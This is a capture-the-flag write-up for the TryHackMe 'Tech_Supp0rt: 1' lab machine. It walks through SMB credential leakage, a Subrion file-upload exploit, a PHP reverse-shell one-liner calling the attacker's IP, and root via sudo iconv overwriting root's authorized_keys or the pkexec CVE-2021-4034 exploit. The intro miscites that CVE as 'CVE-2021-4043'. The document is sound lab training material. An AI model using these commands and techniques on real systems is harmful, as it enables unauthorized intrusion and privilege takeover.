THM: Tech_Supp0rt: 1
Intro⌗
THM: Tech_Supp0rt: 1 is a linux boot to root challenge where we’ll pwn a fake tech support scam company. We’ll start by leaking credentials for a web CMS through an open SMB share. The CMS turns out to be vulnerable to authenticated arbitrary file uploads, and since we have creds we can exploit this to get a shell. Once on the box, there are 2 paths we can take to getting a root shell. One involves pivoting to another user on the system and exploiting their sudo privileges, and another involves exploiting CVE-2021-4043.
Recon⌗
┌──(brian㉿kali)-[~/lab/hacks/tryhackme/TechSupport]
└─$ sudo rustscan -a 10.10.44.13 -- -sV -oA nmap1
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel
On port 80 all we see is the default Apache page, so let’s scan for some content.
┌──(brian㉿kali)-[~/lab/hacks/tryhackme/TechSupport]
└─$ ffuf -t 100 -u http://10.10.44.13/FUZZ -w /usr/share/wordlists/dirb/big.txt -c 1 ⨯
.htpasswd [Status: 403, Size: 276, Words: 20, Lines: 10]
.htaccess [Status: 403, Size: 276, Words: 20, Lines: 10]
server-status [Status: 403, Size: 276, Words: 20, Lines: 10]
test [Status: 301, Size: 309, Words: 20, Lines: 10]
wordpress [Status: 301, Size: 314, Words: 20, Lines: 10]
In the /wordpress
directory we have what looks like a broken/unfinished website for a tech support company.
Let’s run wpscan
to take a closer look.
┌──(brian㉿kali)-[~/lab/hacks/tryhackme/TechSupport]
└─$ wpscan --url http://10.10.44.13/wordpress 4 ⨯
Interesting Finding(s):
[+] WordPress version 5.7.2 identified (Insecure, released on 2021-05-12).
| Found By: Emoji Settings (Passive Detection)
| - http://10.10.44.13/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.7.2'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.10.44.13/wordpress/, Match: 'WordPress 5.7.2'
(Scan results are truncated for brevity.)
WPscan identified the version of WordPress as 5.7.2
and notes that it may be insecure.
A quick search on exploit-db doesn’t turn up anything, so let’s switch gears and look at SMB.
┌──(brian㉿kali)-[~/lab/hacks/tryhackme/TechSupport]
└─$ enum4linux -a 10.10.44.13
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Aug 20 09:02:58 2022
========================================
| Share Enumeration on 10.10.44.13 |
========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
websvr Disk
IPC$ IPC IPC Service (TechSupport server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.10.44.13
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.44.13/print$ Mapping: DENIED, Listing: N/A
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.44.13/websvr Mapping: OK, Listing: OK
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 654.
//10.10.44.13/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
enum4linux
found a websvr
share that we can access without authenticating, so let’s download a copy of whatever is on this share.
┌──(brian㉿kali)-[~/…/hacks/tryhackme/TechSupport/loot]
└─$ smbclient --user='' -N //10.10.44.13/websvr
Try "help" to get a list of possible commands.
smb: \> mask ""
smb: \> recurse
smb: \> prompt
smb: \> mget *
getting file \enter.txt of size 273 as enter.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \>
All we have is a text file, but it has some interesting information:
┌──(brian㉿kali)-[~/…/hacks/tryhackme/TechSupport/loot]
└─$ cat enter.txt
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website
IMP
===
Subrion creds
|->admin:7sKvn...REDACTED...KWCk [cooked with magical formula]
Wordpress creds
|->
We found some credentials for Subrion which is another open source CMS.
The note we found hints that there is also a /subrion
directory, so let’s fuzz that.
┌──(brian㉿kali)-[~/lab/hacks/tryhackme/TechSupport]
└─$ ffuf -t 100 -u http://10.10.44.13/subrion/FUZZ -w /usr/share/wordlists/dirb/big.txt -c -ac
favicon.ico [Status: 200, Size: 1150, Words: 10, Lines: 4]
robots.txt [Status: 200, Size: 142, Words: 9, Lines: 8]
sitemap.xml [Status: 200, Size: 628, Words: 6, Lines: 4]
Great, the robots.txt
is a good find. Now we know where the admin panel is.
┌──(brian㉿kali)-[~/lab/hacks/tryhackme/TechSupport]
└─$ curl http://10.10.44.13/subrion/robots.txt
User-agent: *
Disallow: /backup/
Disallow: /cron/?
Disallow: /front/
Disallow: /install/
Disallow: /panel/
Disallow: /tmp/
Disallow: /updates/
We already know admin
is a username, we just need to crack the password. The note we found hinted the password is “cooked with a magical formula”. 🤔
CyberChef has a really neat “magic” operation where it will attempt to deobfuscate input by automatically determining the encoding scheme that was used to generate the obfuscated string.
Using this feature we will be able to get the plaintext version of the password and then log in to the Subrion Admin Panel.
Getting a Shell⌗
Let’s search for exploits for this version 4.2.1
of Subrion.
There is an authenticated arbitrary file upload exploit that looks very interesting. It uploads a web shell and provides a CLI interface. We can use this to send ourselves a reverse shell.
We can searchsploit -m 49876
to pull a copy of the exploit.
┌──(brian㉿kali)-[~/…/hacks/tryhackme/TechSupport/exploits]
└─$ python3 49876.py -u http://10.10.44.13/subrion/panel/ -l admin -p Scam2021
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422
[+] Trying to connect to: http://10.10.44.13/subrion/panel/
[+] Success!
[+] Got CSRF token: YcotFAkgY8Oj7eL54nQhWa9s2VEwdNtpAOppL848
[+] Trying to log in...
[+] Login Successful!
[+] Generating random name for Webshell...
[+] Generated webshell name: aysmrezeebarxrx
[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://10.10.44.13/subrion/panel/uploads/aysmrezeebarxrx.phar
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Now with this PHP payload we can send a shell:
php -r '$sock=fsockopen("10.13.17.127",9001);$proc=proc_open("/bin/bash", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
┌──(brian㉿kali)-[~/lab/hacks/tryhackme/TechSupport]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.13.17.127] from (UNKNOWN) [10.10.44.13] 39798
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@TechSupport:/var/www/html/subrion/uploads$ ^Z
zsh: suspended nc -nlvp 9001
┌──(brian㉿kali)-[~/lab/hacks/tryhackme/TechSupport]
└─$ stty raw -echo; fg 148 ⨯ 1 ⚙
[1] + continued nc -nlvp 9001
www-data@TechSupport:/var/www/html/subrion/uploads$
<ww/html/subrion/uploads$ export TERM=xterm-256color
www-data@TechSupport:/var/www/html/subrion/uploads$ export SHELL=bash
www-data@TechSupport:/var/www/html/subrion/uploads$ stty rows 70 columns 111
Privilege Escalation⌗
There are (at least) 2 privilege escalation paths we can take to getting a root shell on this box.
Intended Path⌗
First let’s check for other users with shell access on the box.
www-data@TechSupport:/var/www/html/wordpress$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
scamsite:x:1000:1000:scammer,,,:/home/scamsite:/bin/bash
Both Subrion and Wordpress will have database credentials stored in config files, so let’s see if we can find the password for the scamsite user.
www-data@TechSupport:/var/www/html/wordpress$ cat wp-config.php | grep DB
define( 'DB_NAME', 'wpdb' );
define( 'DB_USER', 'support' );
define( 'DB_PASSWORD', '...REDACTED...' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8' );
define( 'DB_COLLATE', '' );
www-data@TechSupport:/var/www/html/wordpress$ su scamsite
Password:
scamsite@TechSupport:/var/www/html/wordpress$ id
uid=1000(scamsite) gid=1000(scamsite) groups=1000(scamsite),113(sambashare)
Awesome, now we have a shell as scamsite. Let’s check for sudo privileges next.
scamsite@TechSupport:/var/www/html/wordpress$ sudo -l
Matching Defaults entries for scamsite on TechSupport:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User scamsite may run the following commands on TechSupport:
(ALL) NOPASSWD: /usr/bin/iconv
We can run iconv
as root, and according to GTFObins, this can be used to read and write files as root.
This means we could go ahead and read /root/root.txt
, but what we really want is a root shell.
To achieve this we can generate a keypair on our machine and exploit our ability to run iconv as root to add our public key to root’s authorized keys file. This will allow us to SSH to the box as root.
┌──(brian㉿kali)-[~/lab/hacks/tryhackme/TechSupport]
└─$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/brian/.ssh/id_rsa): ./id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa
Your public key has been saved in ./id_rsa.pub
The key fingerprint is:
SHA256:sp4+MQqh+KSNDbEcT3sSB42yKlOCB/FqOW+OiDX0IF8 brian@kali
The key's randomart image is:
+---[RSA 3072]----+
|.. o |
|.o o . |
|..+ . |
|++=o . |
|*@*.E . S |
|X==B .oo |
|.X+++..o |
|=.B..... |
|o. . .+. |
+----[SHA256]-----+
Now on the target we need to write our public key.
scamsite@TechSupport:/dev/shm$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHw4FPwRC+q1Gql/DyV6HmqyPKYgbgOEp7dAIcp+mJGBdTx+1zBCKnQxvm3bsbLfK9vTiHG+wdHNFVGrsoMNpF3/ul4I1TIpFYL39vgqadbjJ2EPFmhJ3sbvB+5qM3UaG0qGTgKp9lSij5bVWVfNES2/4mihPaSNtnOBhUBFEpdY+z+3af/8rZ0nVu3uOMhng5BtUJda9zzHcTtSt2pKQw7hMMiegamoJECrLo2nW62yMrOhuNdmvJvpN1guNDFuU3bWEe1REvOZbclCT0FzdO56aGZGwpzVMTZfOlOAGtC089+kpzXmhurPawVVYvbl+zdcSNXS10GJuZzOBYWgWFFHMxcZrvgQ98Rlp3avlv8+2ylzlwj2uiR2RPLPOq7zf+z5kAxjCocw4AoqafM4DOOWExyg+a6WzFNR8GPX3GD095Q5ORgRuOt0JCHZhGI50sJYOAlbxBTVaYnoCSd/zrlbrDJ2dsf+7Pq+6ZpNlvrLzVtknVmxHHHWGUZFwiJgs= brian@kali" | sudo iconv -f 8859_1 -t 8859_1 -o "/root/.ssh/authorized_keys"
And with that, we can now SSH our way in with our key and grab the flag.
┌──(brian㉿kali)-[~/lab/hacks/tryhackme/TechSupport]
└─$ ssh -i id_rsa root@10.10.73.106
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-186-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
120 packages can be updated.
88 updates are security updates.
Last login: Sun Nov 21 11:17:57 2021
root@TechSupport:~# id
uid=0(root) gid=0(root) groups=0(root)
root@TechSupport:~# wc -c /root/root.txt
44 /root/root.txt
Unintended Path⌗
We can transfer and run LinPEAS on the target to assist with finding a privilege escalation vector.
LinPEAS identifies that the pkexec
utility is vulnerable to CVE-2021-4034.
A local privilege escalation vulnerability was found on polkit’s pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according predefined policies. The current version of pkexec doesn’t handle the calling parameters count correctly and ends trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way it’ll induce pkexec to execute arbitrary code. When successfully executed the attack can cause a local privilege escalation given unprivileged users administrative rights on the target machine.
Many of the public exploits for this vulnerability are written in C and must be compiled on the target to work, and unfortunately our target does not have one installed.
However we can use this python exploit to get a root shell. The code is short enough that we can simply copy and paste it into a file via vim
or nano
on the target. Then all we have to do is make it executable and run it.
www-data@TechSupport:/tmp$ chmod +x cve.py
www-data@TechSupport:/tmp$ ./cve.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# id
uid=0(root) gid=33(www-data) groups=33(www-data)
# cd /root && ls -la
total 48
drwx------ 5 root root 4096 May 29 2021 .
drwxr-xr-x 23 root root 4096 May 28 2021 ..
-rw------- 1 root root 3588 Nov 21 2021 .bash_history
-rw-r--r-- 1 root root 3106 Oct 22 2015 .bashrc
drwx------ 2 root root 4096 May 28 2021 .cache
-rw------- 1 root root 382 May 29 2021 .mysql_history
drwxr-xr-x 2 root root 4096 May 28 2021 .nano
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4096 May 29 2021 .ssh
-rw------- 1 root root 4332 May 29 2021 .viminfo
-rw-r--r-- 1 root root 44 May 28 2021 root.txt
# wc -c root.txt
44 root.txt
✅